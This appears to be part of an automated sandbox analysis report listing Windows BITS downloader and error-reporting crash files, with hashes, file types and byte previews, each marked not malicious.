                                                                                                            SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                                                            SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                                                            SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                                                            Malicious:false
                                                                                                            Preview: .............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:MPEG-4 LOAS
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.24942566786740486
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4k:BJiRdwfu2SRU4k
                                                                                                            MD5:F78E70A1621F2D5C73A7D5A9F1114557
                                                                                                            SHA1:02444FDD416593D5609ED34E781BD80BBABADB17
                                                                                                            SHA-256:B0247AA90FBD07D35C07CD761E4CE4D6E981DE9252E45430CCC8926E10978F45
                                                                                                            SHA-512:B4CA883A2E0C299C574335BD385744FFE109E8E270194E316D3CB968DE5FF009A4DB4479DECE14FB467CE31AB4BA1BEEA4F77CB3EDD5BFF47F321351DB651797
                                                                                                            Malicious:false
                                                                                                            Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xaa8f4eab, page size 16384, Windows version 10.0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):786432
                                                                                                            Entropy (8bit):0.25060064220021383
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:HESE3+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:HESE8SB2nSB2RSjlK/+mLesOj1J2
                                                                                                            MD5:3131682BBEA03E9062431DF4D4A37425
                                                                                                            SHA1:F142C57DE3CE14B3CD740156499470EA607A54EA
                                                                                                            SHA-256:FB91C9E4763A52EBD86C30EFED3D88B118CB129C817008A131A46D8674C79312
                                                                                                            SHA-512:121D4A1FC467A98BCD4EADA96DE61A91E6FD0D4813F9116E9A551F6EE269C844CA4CA515BE79D53CE580AE0F482FC6475AA5DAFB1FF752D94DDE3BE68FB705EE
                                                                                                            Malicious:false
                                                                                                            Preview: ..N.... ................e.f.3...w........................).....4$...y...!...y).h.(.....4$...y....)..............3...w...........................................................................................................B...........@...................................................................................................... .......................................................................................................................................................................................................................................................4$...y......................4$...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16384
                                                                                                            Entropy (8bit):0.07430065591163745
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:aXJ7v7wuRkpDYEDge3lTpyyll3Vkttlmlnl:aXJrLMV3
                                                                                                            MD5:8978474C3FAEE60FE67EC9A3CEECB56B
                                                                                                            SHA1:08DBA96654DF218266F5E94B0F5B218A44880191
                                                                                                            SHA-256:DF10EF51ADAA2ECFECA26DA8F0C537592DFFD066AC204167AE7ABA4C370A1D2A
                                                                                                            SHA-512:FB3520CB49477C38686F994CAA110B79AF19F079590B460DB392B1228A75E5725F375C8A2CB63B490D292DF32B948400E77C959B713361B160EE2088973CE272
                                                                                                            Malicious:false
                                                                                                            Preview: x3.s.....................................3...w...!...y).4$...y..........4$...y..4$...y..(.Q.3$...y/.....................4$...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_747b3d3843a661accc8c92924ccfd5a2e2d128_d70d8aa6_10c8bd69\Report.wer
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.6749421180832825
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:PCdstZqyay9hkoyt7JfqpXIQcQ5c6A2cE2cw33+a+z+HbHgkVG4rmMOyWZAXGngP:6eBDHnM28jjoq/u7sVS274ItW
                                                                                                            MD5:3A3ED2564A039109118313347F1708C4
                                                                                                            SHA1:F6DDCC7CAC4CA49BA35D04F47513C87A41C912D4
                                                                                                            SHA-256:70C976E3B6692CFC41EB7E7465231DF682098510B8CED3F6BABAD57322934D90
                                                                                                            SHA-512:82110461E1AB100899944DC61A276806949C132DB87513C982E74B67E1856B63A6127D1023586DE970918576A507C9016E59BDD293C432CD1C99F10ECAA3A5BE
                                                                                                            Malicious:false
                                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.4.0.1.2.2.0.9.3.5.0.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.8.3.e.4.8.4.-.9.e.c.4.-.4.c.1.5.-.9.f.3.f.-.1.2.a.c.f.6.7.4.0.e.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.f.5.f.a.9.d.-.8.a.8.6.-.4.6.9.9.-.8.5.2.d.-.1.5.0.f.5.c.0.e.c.d.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.3.8.-.0.0.0.1.-.0.0.1.6.-.c.1.1.d.-.8.e.b.0.a.2.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_12d4f551\Report.wer
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):65536
                                                                                                            Entropy (8bit):0.6786399792915607
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:ywFUAtZqyfy9hk1Dg3fWpXIQcQxc6VcEzcw3VR+a+z+HbHgkVG4rmMOyWZAXGngm:Xe8BfHPRZvjoq/u7sVS274ItW
                                                                                                            MD5:E042DAF2DC9C863DE6347875D5957573
                                                                                                            SHA1:AF0902501CD2A5179FBBD762FF0B061DD67D86F7
                                                                                                            SHA-256:2DDC12FFFF33ADD57AC88C378CF97F48B86C4A98E34B372CC0DB6CA12B9AA4A7
                                                                                                            SHA-512:2B2FF5E1718C8A833CC10DB2C0E94EAC6A816419CB9464AE02B9576607E5FA4E6E575F1384FDB24C21DC3264278CEEA4168CF73371E8E2C73AB131DFCE2747CF
                                                                                                            Malicious:false
                                                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.4.0.1.3.3.3.0.1.4.8.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.9.4.0.1.3.9.7.0.7.7.0.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.8.5.9.3.c.5.-.c.9.5.b.-.4.e.f.a.-.9.3.d.a.-.9.2.1.4.e.6.c.1.5.b.6.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.4.8.9.2.9.f.-.a.8.3.6.-.4.1.4.f.-.9.4.d.e.-.9.2.1.d.a.8.6.4.f.f.7.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.3.8.-.0.0.0.1.-.0.0.1.6.-.c.1.1.d.-.8.e.b.0.a.2.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER1060.tmp.csv
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):46004
                                                                                                            Entropy (8bit):3.065480441846344
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:4OHqvEKfy622Br2k8AqqnmZBrmNhlZI+r2nY12hA1E1bnSbBF:4OHofy622BrL8AqqnmZUZI+SnY12hAO4
                                                                                                            MD5:328665A094D81CC2FCB5A0F21A7A4A19
                                                                                                            SHA1:BAF52DBF1E60DB3F75422EB5FF91C58226726C72
                                                                                                            SHA-256:B588FDD79B06CF99BB0EF6650DF74AB75139E37C138C61E5CFD7C399A8715453
                                                                                                            SHA-512:E05096C9B361674B2EC50E0532C6F219A7AF333AFB9D41E0FAB42E980336AF89A24AC89C75DB01DA347C57CE066C9EB2FE34963FD05798C47A2DC7758C80306A
                                                                                                            Malicious:false
                                                                                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER13EB.tmp.txt
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):13340
                                                                                                            Entropy (8bit):2.6945194190417383
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:9GiZYWzBA/y4XvtYuY4WYHlYEZt9otCiB4ZLjCwqccaB3G1FVIFy3:9jZDzSZh9WH9aB3G1FqFy3
                                                                                                            MD5:74498F05CEDE84291AB14E0BEEE931EC
                                                                                                            SHA1:173685F447342F3CF74DF0517900C9FD57830437
                                                                                                            SHA-256:48F567AE55B235BB8828A703488B94D3BF1450AD46B06BD4B79C33FF8F83A978
                                                                                                            SHA-512:E993D3E75B7CD27F18C55F404DCD1A3E297F4EFCE52A47C1D43CA38B8B5784CEC24DEB8BFC8AEDECE5DEB64BF07C34AC47BEB3D6378D1A4FE12D6A61B7125329
                                                                                                            Malicious:false
                                                                                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAAC.tmp.dmp
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 17:35:22 2021, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):27136
                                                                                                            Entropy (8bit):2.52531299843665
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:RyWPVJcAOrud9+fPh3xrgl5c7EIWYvxDMhNn:nV+XrudYvgrc7zWa1ep
                                                                                                            MD5:38BDD294A991B5BDA3B88EB0AEF4E844
                                                                                                            SHA1:CCEE4A5D3C3A859529AB319CCFD5C9D5A28005FA
                                                                                                            SHA-256:3F1301C539E5E5B08400D0439CC0AF29E341E7B4878943EBAA11C6F2BFF24F1B
                                                                                                            SHA-512:7AC7BEEB443629B5B9736FFDE91A99A54DD7AB15CEB2B2527ABCC69832D5851273A5FB74A99FCAD31824B46C0349747AC248D198CA61FCA7C1359ED93D8B65C1
                                                                                                            Malicious:false
                                                                                                            Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........h....]...........................................................................................U...........B......p.......GenuineIntelW...........T.......8...\..a)............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFED.tmp.WERInternalMetadata.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8340
                                                                                                            Entropy (8bit):3.6988695768145643
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:Rrl7r3GLNiRa6Xi6YIiSUaSgmfcSzTCpBb89b7ZsfmYvpm:RrlsNiM6y6YNSUaSgmfcSz17yfmT
                                                                                                            MD5:BE78AD3D99466DD597431BDFC39696CA
                                                                                                            SHA1:89CC1B5C0EE3D4E60D59A70DC93A1D52FC75CF68
                                                                                                            SHA-256:4FEAD19B1153997839CB05A5B0CC33EDB4153B65D7DFC1D6C7432BE4985FD181
                                                                                                            SHA-512:05F77F2DD49B1ED429FF905551DB310597CEAA553D8040F7D613E5503C9F0C96CD4811A4BBF266D6CF07141E33A055716CD1E7954FEC0827EEE9A05D54CCE0BA
                                                                                                            Malicious:false
                                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.1.6.<./.P.i.d.>.......
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB349.tmp.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4598
                                                                                                            Entropy (8bit):4.471818356077874
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwSD8zs+JgtWI9TDWSC8Bfs8fm8M4J2ynZFUS+q84WDeKcQIcQwQed:uITf04ySNjJ1BYeKkwQed
                                                                                                            MD5:3FF9642F2B892DFF5D70F144E42459A3
                                                                                                            SHA1:030FF5B434093F22C44EAF6F0B7B3969C4E2D1F2
                                                                                                            SHA-256:CEDA14EB77F235A93E2923D9BFD5F7F17DB41B88E3B355A08A77C720CAC6A9E7
                                                                                                            SHA-512:864D41BA3EDD22B41870D97311589E22CCE2140632CAEDE9B746211DEE29B9B771973416C803CE7EF20590356ED00F883129F92B2ADB14BCC6EF328E90B3F0C7
                                                                                                            Malicious:false
                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1280326" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERD66F.tmp.dmp
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Dec 2 17:35:33 2021, 0x1205a4 type
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1060132
                                                                                                            Entropy (8bit):1.4694068307761825
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:xtDXsbhkymLmXp+84v4c+mWyVFZ5NH2tfB3hoBCs4Zn8xKKzfCVQ7hf:HLvymLmXEUIWTxZ8O2
                                                                                                            MD5:E3ECF4AB72BEC8ED688353E19C191F41
                                                                                                            SHA1:890523D48D2C970CC46C17F79BBD75108E6E94AB
                                                                                                            SHA-256:A0E30DBE92F994FFA1E585B18CF31418097ACCF8FDA52EA4FEE2FAD5CC426509
                                                                                                            SHA-512:26D821B57AEEDFF19CA3D4593C16F89EAD23490C7E27F63DF29B8A2FD11E558C431D5074DD9D98EF676DDFFECAFBA8346622D3DE289668D505CFE07227590EE8
                                                                                                            Malicious:false
                                                                                                            Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........@.... ...........................................................................................U...........B......p.......GenuineIntelW...........T.......8...\..a)............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE40.tmp.WERInternalMetadata.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8300
                                                                                                            Entropy (8bit):3.6934115243253127
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:Rrl7r3GLNiRzg6P6YITSU6KgmfL8GSoCpDv89bMZsfPPvEm:RrlsNi1g6P6YMSU6KgmfLrS4MyfPx
                                                                                                            MD5:0375ED25232FD5816BA1A6C32E4D8C30
                                                                                                            SHA1:74DCAB06EDBC31EC2FF5CF1C5E40BFA297FC79BD
                                                                                                            SHA-256:8AA8C30F217EE33F64B81940138E2F8AFC974B039814DBCAB48B133BD31E588F
                                                                                                            SHA-512:9581A738AE89CC5664DB43F00F1B3A52D804359B44F0F4F4CD1AA5D86247878B09F52C0421CC985E3274D42D29580FD5BDE3C7BFBB8B7C7936AFB315F828BF96
                                                                                                            Malicious:false
                                                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.1.6.<./.P.i.d.>.......
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE268.tmp.xml
                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4558
                                                                                                            Entropy (8bit):4.429864115942591
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:cvIwSD8zs+JgtWI9TDWSC8Bp8fm8M4J2yGtFFe+q84tjCKcQIcQwQed:uITf04ySNEJE4xCKkwQed
                                                                                                            MD5:72F8264FEC96FC575B1B5E5B12A07146
                                                                                                            SHA1:9B28B40C85481FE154042C341898D2037E652C95
                                                                                                            SHA-256:7758F92C3E6DB4BA3B3109DFCF0D5AC6C665BCE73080C3D9909407BA08F38B00
                                                                                                            SHA-512:22F91988EC4CF796945B612ED67FBDD3B5B8CB008C8562274F7B65F852BC98653798F82AACE95A92B7BF7E6FD482C8AEBCB113E5724B76E4BBA42B1E5BCE4313
                                                                                                            Malicious:false
                                                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1280326" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE2A7.tmp.csv
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):46408
                                                                                                            Entropy (8bit):3.065873808938448
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:aNHLR3EFdibDx22KK2kSAKqnmZmrmNhFk/Sr25I+imqIkhGWrHYey:aNH2dibDx22KKLSAKqnmZ9k/SS5I+imZ
                                                                                                            MD5:194827815D8B2AC522E8BF66C2C6966D
                                                                                                            SHA1:385327742309D0D27C0AD42360C5F2F0A2D3B224
                                                                                                            SHA-256:A80AF9B8F112D9F55F0563750D03E758DA804B670949F8B339C6836D2442BCEC
                                                                                                            SHA-512:152EA9FD85743A7D06F5EA707E8DF001C1001463A546B46EC2240911E76A90B7602E360A5C106FD88F985253B4126F586E733965CB83C174B239BF4A884A291C
                                                                                                            Malicious:false
